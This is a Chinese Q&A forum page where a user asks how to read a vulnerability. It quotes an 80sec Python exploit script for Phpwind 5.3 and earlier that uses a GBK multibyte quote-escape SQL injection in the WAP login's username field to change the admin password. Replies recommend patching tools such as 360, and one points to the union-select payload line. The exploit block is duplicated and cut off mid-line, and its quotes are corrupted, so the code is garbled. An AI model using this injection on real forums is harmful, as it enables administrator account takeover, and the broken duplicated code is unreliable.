请问漏洞该怎么看
来源:百度知道 编辑:UC知道 时间:2024/09/21 23:34:21
甚至不用注册账户,只要精心构造username即可利用此漏洞。
漏洞利用:80sec提供exploit如下:
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)
argvs=sys.argv
data = "db_wapifopen=1&prog=login&pwuser=shit%c1'union select "+argvs[2]+”,mid(md5(123456),9,16),3,1,5/*&pwpwd=123456〃
pwurl = “%s” % argvs[1]
pwurl = pwurl + “wap/index.php”
print “\r\n\r\nPhpwind Admin Pass Change Exploit”
print “Phpwind <=5.3 "
print "By 80sec "
print "python.exe "+argvs[0]+" http://www.80sec.com/pwforum/ 1\r\n"
print "\r\n[+]TargetForum: "+argvs[1]
print "[+]TargetId: "+argvs[2]
request = urllib2.Request(
url = pwurl ,
headers = {'Content-Type
漏洞利用:80sec提供exploit如下:
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)
argvs=sys.argv
data = "db_wapifopen=1&prog=login&pwuser=shit%c1'union select "+argvs[2]+”,mid(md5(123456),9,16),3,1,5/*&pwpwd=123456〃
pwurl = “%s” % argvs[1]
pwurl = pwurl + “wap/index.php”
print “\r\n\r\nPhpwind Admin Pass Change Exploit”
print “Phpwind <=5.3 "
print "By 80sec "
print "python.exe "+argvs[0]+" http://www.80sec.com/pwforum/ 1\r\n"
print "\r\n[+]TargetForum: "+argvs[1]
print "[+]TargetId: "+argvs[2]
request = urllib2.Request(
url = pwurl ,
headers = {'Content-Type
下个360看,
支持原创,回答开始:
LZ说的代码我也不明白,但是我想给以下建议:
1。可以下载一些打补丁的软件。比如:360,超级兔子
2。如果你是vista的系统,在控制面板里有“检查更新”,经常检查并下载。
360和超级兔子的优劣:
360公认的打补丁的好软件,但是补丁下载速度较慢。超级兔子下载速度快。
360和超级兔子有时会找到不同的补丁(即只有一个监测到),所以建议两个都装,但是不要重复的打,会造成错乱。
回答完毕,请指示!
用360安全卫士修补吧
用膏药贴住
用杀毒软件修补!
这是用的SQL注入,关键看这里
pwuser=shit%c1'union select "+argvs[2]+”,mid(md5(123456),9,16),3,1,5/*